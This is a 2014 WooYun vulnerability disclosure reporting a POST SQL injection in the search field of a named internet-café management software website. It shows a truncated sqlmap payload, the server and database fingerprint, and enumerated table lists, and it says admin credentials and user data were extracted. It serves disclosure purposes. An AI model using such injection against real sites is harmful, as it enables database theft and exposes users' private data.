当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061911

漏洞标题:摇钱树网吧管理软件SQL注射导致大量用户敏感信息泄露

相关厂商:摇钱树网吧管理软件

漏洞作者: Focusstart

提交时间:2014-05-23 14:30

修复时间:2014-07-07 14:30

公开时间:2014-07-07 14:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-07-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

摇钱树网吧管理软件SQL注射导致大量用户敏感信息泄露

详细说明:

注册个用户登陆后,访问如下地址:
http://www.soft.u7pk.com/User_bbs.html

71.jpg


搜索处存在post注入
payload太长了,就不全部给出了

Place: POST
Parameter: TextBox1
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTM1Njk5NTU5Mg9kFgICAw9kFgoCAQ9kFgQCAQ8WAh4EVGV4dAWRAeasoui/juaCqO+
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
current user: 'yqsuser'
给出部分表吧
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: msdb
[82 tables]
+--------------------------------------------+
| RTblClassDefs |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_databases |
| log_shipping_monitor |
| log_shipping_plan_databases |
| log_shipping_plan_history |
| log_shipping_plans |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
Database: youxi
[54 tables]
+--------------------------------------------+
| QQ |
| admin |
| article |
| banner |
| bbs |
| collect |
| costrate |
| cqzcm |
| diaocha |
| dls |
| down |
| dtproperties |
| dzmac |
| factive |
| filesize |
| findpass |
| gactive |
| game |
| ggbfjl |
| gonggao |
| help |
| ip |
| jianjie |
| joinactive |
| jyzcm |
| jzxzb |
| leaveword |
| loginfo |
| monthtmp |
| mrgg |
| notes |
| orderform |
| phb |
| pk |
| plantab |
| pricelist |
| site |
| softintro |
| softnews |
| softweb |
| sysconstraints |
| syssegments |
| temp |
| tempphb |
| toupiao |
| userm |
| wbm |
| wenzhang |
| xzzj |
| yxm |
| yxxzb |
| zcxx |
| zczhuc |
| yqsuser.pangolin_test_table |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |


管理员用户名和密码

72.jpg


大量用户敏感信息,这里贴出一部分吧

73.jpg


74.jpg

漏洞证明:

见上

修复方案:

Null

版权声明:转载请注明来源 Focusstart@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论